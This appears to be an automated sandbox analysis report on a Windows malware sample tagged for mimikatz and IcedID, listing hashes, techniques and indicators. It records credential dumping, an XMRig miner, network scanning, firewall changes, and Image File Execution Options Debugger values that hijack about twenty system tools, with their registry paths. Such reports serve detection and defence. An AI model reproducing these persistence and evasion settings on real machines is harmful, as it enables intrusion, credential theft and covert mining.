Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-10-2024 07:45
Behavioral task
behavioral1
Sample
2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe
-
Size
9.3MB
-
MD5
904cc8ea3750d5f4349f5dc261f41eee
-
SHA1
ed5f4ee93bb7701a863fe3f48c6ecb79ef4a2e1b
-
SHA256
d36fbd22e5e79a66c683f6aa6eedae31b8fb715b04e2587334471f6881bdc83b
-
SHA512
6e6b665b6d5bd6ff4eb8445d28bdecd0c07a3fb556fd1aa9f0e96783bb763367247cb7f9db88314f4ea32e205e634cf5ed9f674422cc34f4220b2fafeaf6d2bd
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
ysyeeye.exedescription pid Process procid_target PID 1396 created 1692 1396 ysyeeye.exe 37 -
Contacts a large (20560) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
Processes:
resource yara_rule behavioral2/memory/2612-179-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp xmrig behavioral2/memory/2612-183-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp xmrig behavioral2/memory/2612-200-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp xmrig behavioral2/memory/2612-213-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp xmrig behavioral2/memory/2612-222-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp xmrig behavioral2/memory/2612-235-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp xmrig behavioral2/memory/2612-246-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp xmrig behavioral2/memory/2612-253-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp xmrig behavioral2/memory/2612-255-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp xmrig behavioral2/memory/2612-270-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/2136-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2136-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000b000000023b7d-6.dat mimikatz behavioral2/memory/748-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3628-138-0x00007FF7A9AB0000-0x00007FF7A9B9E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
ysyeeye.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts ysyeeye.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts ysyeeye.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
ysyeeye.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ysyeeye.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 2900 netsh.exe 3220 netsh.exe -
Executes dropped EXE 27 IoCs
Processes:
ysyeeye.exeysyeeye.exewpcap.exenimusahes.exevfshost.exesbgiuuhde.exexohudmc.exeogmqci.exerniyyi.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exeysyeeye.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exergiaeelul.exeysyeeye.exepid Process 748 ysyeeye.exe 1396 ysyeeye.exe 2204 wpcap.exe 3028 nimusahes.exe 3628 vfshost.exe 976 sbgiuuhde.exe 3464 xohudmc.exe 4824 ogmqci.exe 2612 rniyyi.exe 3564 sbgiuuhde.exe 4520 sbgiuuhde.exe 3312 sbgiuuhde.exe 3680 sbgiuuhde.exe 920 sbgiuuhde.exe 628 sbgiuuhde.exe 4504 sbgiuuhde.exe 3728 sbgiuuhde.exe 372 sbgiuuhde.exe 712 sbgiuuhde.exe 4480 sbgiuuhde.exe 5008 ysyeeye.exe 1100 sbgiuuhde.exe 3560 sbgiuuhde.exe 3900 sbgiuuhde.exe 3496 sbgiuuhde.exe 3032 rgiaeelul.exe 1044 ysyeeye.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exenimusahes.exepid Process 2204 wpcap.exe 2204 wpcap.exe 2204 wpcap.exe 2204 wpcap.exe 2204 wpcap.exe 2204 wpcap.exe 2204 wpcap.exe 2204 wpcap.exe 2204 wpcap.exe 3028 nimusahes.exe 3028 nimusahes.exe 3028 nimusahes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 70 ifconfig.me 71 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
wpcap.exeysyeeye.exexohudmc.exedescription ioc Process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ysyeeye.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ysyeeye.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ysyeeye.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF ysyeeye.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\ogmqci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ysyeeye.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ysyeeye.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ysyeeye.exe File created C:\Windows\SysWOW64\ogmqci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ysyeeye.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ysyeeye.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ysyeeye.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF ysyeeye.exe -
Processes:
resource yara_rule behavioral2/files/0x0016000000023c35-134.dat upx behavioral2/memory/3628-135-0x00007FF7A9AB0000-0x00007FF7A9B9E000-memory.dmp upx behavioral2/memory/3628-138-0x00007FF7A9AB0000-0x00007FF7A9B9E000-memory.dmp upx behavioral2/files/0x0008000000023c53-141.dat upx behavioral2/memory/976-142-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/976-146-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/files/0x0008000000023c50-164.dat upx behavioral2/memory/2612-165-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp upx behavioral2/memory/3564-171-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/4520-176-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/2612-179-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp upx behavioral2/memory/3312-181-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/2612-183-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp upx behavioral2/memory/3680-186-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/920-190-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/628-194-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/4504-198-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/2612-200-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp upx behavioral2/memory/3728-203-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/372-207-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/712-211-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/2612-213-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp upx behavioral2/memory/4480-216-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/2612-222-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp upx behavioral2/memory/1100-225-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/3560-229-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/3900-232-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/3496-234-0x00007FF793970000-0x00007FF7939CB000-memory.dmp upx behavioral2/memory/2612-235-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp upx behavioral2/memory/2612-246-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp upx behavioral2/memory/2612-253-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp upx behavioral2/memory/2612-255-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp upx behavioral2/memory/2612-270-0x00007FF6DFF30000-0x00007FF6E0050000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
ysyeeye.execmd.exe2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exergiaeelul.exedescription ioc Process File created C:\Windows\bgysuulnn\UnattendGC\specials\svschost.exe ysyeeye.exe File opened for modification C:\Windows\siltueee\vimpcsvc.xml ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\AppCapture32.dll ysyeeye.exe File opened for modification C:\Windows\bgysuulnn\Corporate\log.txt cmd.exe File created C:\Windows\ime\ysyeeye.exe ysyeeye.exe File created C:\Windows\siltueee\ysyeeye.exe 2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe File created C:\Windows\bgysuulnn\sbbfgiqug\nimusahes.exe ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\ucl.dll ysyeeye.exe File opened for modification C:\Windows\bgysuulnn\sbbfgiqug\Packet.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\libxml2.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\schoedcl.xml ysyeeye.exe File created C:\Windows\bgysuulnn\upbdrjv\swrpwe.exe ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\spoolsrv.xml ysyeeye.exe File created C:\Windows\siltueee\vimpcsvc.xml ysyeeye.exe File opened for modification C:\Windows\siltueee\spoolsrv.xml ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\spoolsrv.xml ysyeeye.exe File created C:\Windows\bgysuulnn\Corporate\vfshost.exe ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\cnli-1.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\exma-1.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\trch-1.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\spoolsrv.exe ysyeeye.exe File created C:\Windows\bgysuulnn\Corporate\mimidrv.sys ysyeeye.exe File created C:\Windows\bgysuulnn\sbbfgiqug\ip.txt ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\ssleay32.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\vimpcsvc.xml ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\docmicfg.xml ysyeeye.exe File created C:\Windows\siltueee\docmicfg.xml ysyeeye.exe File created C:\Windows\bgysuulnn\sbbfgiqug\wpcap.exe ysyeeye.exe File created C:\Windows\bgysuulnn\sbbfgiqug\wpcap.dll ysyeeye.exe File created C:\Windows\bgysuulnn\sbbfgiqug\rgiaeelul.exe ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\Shellcode.ini ysyeeye.exe File created C:\Windows\bgysuulnn\Corporate\mimilib.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\docmicfg.xml ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\schoedcl.exe ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\schoedcl.xml ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\svschost.xml ysyeeye.exe File created C:\Windows\siltueee\spoolsrv.xml ysyeeye.exe File created C:\Windows\siltueee\schoedcl.xml ysyeeye.exe File opened for modification C:\Windows\siltueee\docmicfg.xml ysyeeye.exe File created C:\Windows\bgysuulnn\sbbfgiqug\Packet.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\vimpcsvc.exe ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\vimpcsvc.xml ysyeeye.exe File created C:\Windows\bgysuulnn\sbbfgiqug\scan.bat ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\crli-0.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\libeay32.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\trfo-2.dll ysyeeye.exe File opened for modification C:\Windows\siltueee\ysyeeye.exe 2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\docmicfg.exe ysyeeye.exe File opened for modification C:\Windows\siltueee\schoedcl.xml ysyeeye.exe File opened for modification C:\Windows\bgysuulnn\sbbfgiqug\Result.txt rgiaeelul.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\tibe-2.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\xdvl-0.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\zlib1.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\coli-0.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\posh-0.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\specials\tucl-1.dll ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\svschost.xml ysyeeye.exe File created C:\Windows\siltueee\svschost.xml ysyeeye.exe File opened for modification C:\Windows\siltueee\svschost.xml ysyeeye.exe File created C:\Windows\bgysuulnn\UnattendGC\AppCapture64.dll ysyeeye.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 2208 sc.exe 4584 sc.exe 2308 sc.exe 3188 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
netsh.exenet.exenet.execmd.execmd.execmd.exenetsh.execmd.execacls.execmd.execmd.execmd.execmd.exenetsh.execmd.exenet1.exenetsh.exenetsh.execmd.exenetsh.exenet1.execmd.exeschtasks.exenetsh.execmd.exenet1.exenet.execmd.execmd.exenet.exenimusahes.execmd.execmd.execmd.exesc.execmd.execacls.exenet1.execmd.execmd.exenet1.execacls.execacls.exenetsh.exenetsh.execmd.execacls.execmd.exenet.execmd.exenetsh.exergiaeelul.exenetsh.execmd.exesc.exe2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exePING.EXEnet.exenet1.execmd.exeogmqci.exeysyeeye.exenet1.exenet1.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe 